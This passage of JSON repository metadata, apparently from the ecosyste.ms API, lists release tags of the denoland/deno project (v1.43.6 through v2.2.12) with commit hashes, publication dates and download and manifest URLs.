12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.12/manifests"},{"name":"v2.2.11","sha":"225fbd59bf9a1d50603adb99fe2748edf70b9de2","kind":"commit","published_at":"2025-04-18T12:16:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.11","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.11/manifests"},{"name":"v2.2.10","sha":"adc34a6b3b8f6ff593810c0655d0d1a4b7ea3729","kind":"commit","published_at":"2025-04-14T20:59:59.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.10","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.10/manifests"},{"name":"v2.1.12","sha":"16b18e2b8dddde755364b740d63aa7da3646b33c","kind":"commit","published_at":"2025-04-11T23:06:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.12","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.12/manifests"},{"name":"v2.2.9","sha":"25defa74d539d1d6fd27ddabd5260705677c43e8","kind":"commit","published_at":"2025-04-11T18:52:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.9","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.9/manifests"},{"name":"v2.1.11","sha":"d73d467148cff810ccf9c96bed9bcaf32ce5281c","kind":"commit","published_at":"2025-04-08T23:54:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.11","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.11/manifests"},{"name":"v2.2.8","sha":"32b9cc91d8c343bdec2ddcf3cedb27b5efc2f5e4","kind":"commit","published_at":"2025-04-05T01:17:29.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.8","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.8/manifests"},{"name":"v2.2.7","sha":"e7dab411533fd7240fd794398ba9d9590e28f69d","kind":"commit","published_at":"2025-04-04T08:05:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.7","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.7/manifests"},{"name":"v2.2.6","sha":"2037200c4bc903162cd16b71b2564ab5bcd0601e","kind":"commit","published_at":"2025-03-28T05:25:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.6/manifests"},{"name":"v2.2.5","sha":"6e08a9d2291cf45ae4031e163b8c1a03a0e85983","kind":"commit","published_at":"2025-03-21T05:07:53.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.5/manifests"},{"name":"v2.2.4","sha":"33132abbd9ee0defa4bf0332c4797ee4341a03fc","kind":"commit","published_at":"2025-03-14T19:06:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.4/manifests"},{"name":"v2.2.3","sha":"8203278401f4ffcb477a28b3ae9b915d88de7dd7","kind":"commit","published_at":"2025-03-05T04:00:03.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.3/manifests"},{"name":"v2.2.2","sha":"b2e5efd3826974857f4e5a94d87c2c724fa5bf5d","kind":"commit","published_at":"2025-02-25T07:17:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.2/manifests"},{"name":"v2.2.1","sha":"6057bc30da1df2b247f584b5280e1f10c02eec75","kind":"commit","published_at":"2025-02-20T23:41:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.1/manifests"},{"name":"v2.2.0","sha":"29688168631edb677a444ba3cd02b2be21304a1f","kind":"commit","published_at":"2025-02-18T23:12:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.0/manifests"},{"name":"v2.1.10","sha":"073e0879791486f70c7ac99d2d100c3fca6ac461","kind":"commit","published_at":"2025-02-13T06:33:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.10","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.10/manifests"},{"name":"v2.1.9","sha":"46e2f9a47ee5293547efd089438db29690a05f85","kind":"commit","published_at":"2025-01-31T00:21:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.9","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.9/manifests"},{"name":"v2.1.8","sha":"318646f7678111d24b139f4c589a4ef447c8cf1c","kind":"commit","published_at":"2025-01-30T18:19:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.8","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.8/manifests"},{"name":"v2.1.7","sha":"379079d9049499af660b70423aa7cc3aca0d5e52","kind":"commit","published_at":"2025-01-22T00:51:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.7","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.7/manifests"},{"name":"v2.1.6","sha":"4ee86d8d125c7b36570e87f0725eb82b6fe4a4b4","kind":"commit","published_at":"2025-01-16T23:35:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.6/manifests"},{"name":"v2.1.5","sha":"d15a95e28b0ec015c2f2a88cca3882ba96d5da98","kind":"commit","published_at":"2025-01-09T20:55:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.5/manifests"},{"name":"v2.1.4","sha":"b32ed7516cfdaaff76203ca530796d6a1235568d","kind":"commit","published_at":"2024-12-11T03:31:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.4/manifests"},{"name":"v2.1.3","sha":"7f9b1ff30f7d9880b7c825c2b5f2de3137343d76","kind":"commit","published_at":"2024-12-05T23:36:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.3/manifests"},{"name":"v2.1.2","sha":"2039abe8d2bc82fa800f4118707a48ac6f5e02ae","kind":"commit","published_at":"2024-11-28T15:45:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.2/manifests"},{"name":"v2.1.1","sha":"5d71b461530f7c374c08701cef5678a5a4ac5484","kind":"commit","published_at":"2024-11-21T17:28:20.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.1/manifests"},{"name":"v2.1.0","sha":"3da4eca7c1ed97906654671669e0bb3b095bc637","kind":"commit","published_at":"2024-11-21T02:05:02.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.0/manifests"},{"name":"v2.0.6","sha":"8f59d18202e94e5c54ad7e5a79ec1383159e4a20","kind":"commit","published_at":"2024-11-10T04:38:11.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.6/manifests"},{"name":"v2.0.5","sha":"78a799b4947461eb5c6092295cbcdabfe94053f7","kind":"commit","published_at":"2024-11-06T00:19:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.5/manifests"},{"name":"v2.0.4","sha":"b7c282d2f80b12b0b2a435780fb0ea2b236ab224","kind":"commit","published_at":"2024-10-30T00:15:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.4/manifests"},{"name":"v2.0.3","sha":"997bd47fc27ad920f3388c94a95829ff45394c84","kind":"commit","published_at":"2024-10-25T00:57:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.3/manifests"},{"name":"v2.0.2","sha":"22a79ea420e67e783d996d5d1d64983192cb3dd8","kind":"commit","published_at":"2024-10-17T23:28:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.2/manifests"},{"name":"v2.0.1","sha":"99c2aa573057e337f3474d43a7aab8c5e6b4caa2","kind":"commit","published_at":"2024-10-16T22:42:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.1/manifests"},{"name":"v2.0.0","sha":"a62c7e036ab6851c0293f407ead635a7331445b7","kind":"commit","published_at":"2024-10-08T14:37:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.0/manifests"},{"name":"v1.46.3","sha":"a98e146a55b209458160bcd148497310a9e14441","kind":"commit","published_at":"2024-09-04T12:12:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.46.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.46.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.46.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.3/manifests"},{"name":"v1.46.2","sha":"1b62d42631013724432f1ba4a3b04f506450abba","kind":"commit","published_at":"2024-08-29T16:07:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.46.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.46.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.46.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.2/manifests"},{"name":"v1.46.1","sha":"de11ff8c556c6922f832f639f54e5f7a6a3096b9","kind":"commit","published_at":"2024-08-22T14:18:55.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.46.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.46.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.46.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.1/manifests"},{"name":"v1.46.0","sha":"3314a0ceb8f874986d5da9f36f683740bd813750","kind":"commit","published_at":"2024-08-22T00:16:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.46.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.46.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.46.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.0/manifests"},{"name":"v1.45.5","sha":"52fd273834c0675f651577e23785d76f67423ab1","kind":"commit","published_at":"2024-07-31T19:11:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.45.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.45.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.45.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.5/manifests"},{"name":"v1.45.4","sha":"c0b1d19d559bfb1fbb65675b3849a9c0396d131f","kind":"commit","published_at":"2024-07-26T16:38:02.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.45.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.45.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.45.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.4/manifests"},{"name":"v1.45.3","sha":"87ce64e57486fc006e82806c9ed8c49f11c2cb73","kind":"commit","published_at":"2024-07-22T21:34:15.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.45.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.45.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.45.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.3/manifests"},{"name":"v1.45.2","sha":"85de4280a1f9fae572a7331db6344cee123ddab7","kind":"commit","published_at":"2024-07-12T20:04:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.45.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.45.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.45.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.2/manifests"},{"name":"v1.45.1","sha":"c841d163e3dc344c06f10579672cc5e2b095933f","kind":"commit","published_at":"2024-07-11T18:46:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.45.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.45.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.45.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.1/manifests"},{"name":"v1.45.0","sha":"04ff5c731d55f2402e7b08e378eaf6e5a5a4d961","kind":"commit","published_at":"2024-07-10T22:08:02.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.45.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.45.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.45.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.0/manifests"},{"name":"v1.44.4","sha":"892e7c20ac6e7bc0601f4c23e64f43187c1b8479","kind":"commit","published_at":"2024-06-19T16:28:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.44.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.44.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.44.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.4/manifests"},{"name":"v1.44.3","sha":"ab2ab0f7fc4e7bda16544ef96a5e6ba114e799b5","kind":"commit","published_at":"2024-06-19T00:19:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.44.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.44.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.44.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.3/manifests"},{"name":"v1.44.2","sha":"9ca1320746072001feab9f6a26e9c1518609bd7b","kind":"commit","published_at":"2024-06-13T00:51:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.44.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.44.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.44.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.2/manifests"},{"name":"v1.44.1","sha":"e02a32be2797f7c107d19da8bf2aff5bbcd97bad","kind":"commit","published_at":"2024-06-05T23:05:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.44.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.44.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.44.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.1/manifests"},{"name":"v1.44.0","sha":"f3ffffc682604349b96dbe4ad33daa5dd1a09f63","kind":"commit","published_at":"2024-05-30T05:58:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.44.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.44.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.44.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.0/manifests"},{"name":"v1.43.6","sha":"7df3d5aeec14f24e5fdec1e1e6f5739f1fbeebbe","kind":"commit","published_at":"2024-05-21T23:34:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.6","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/t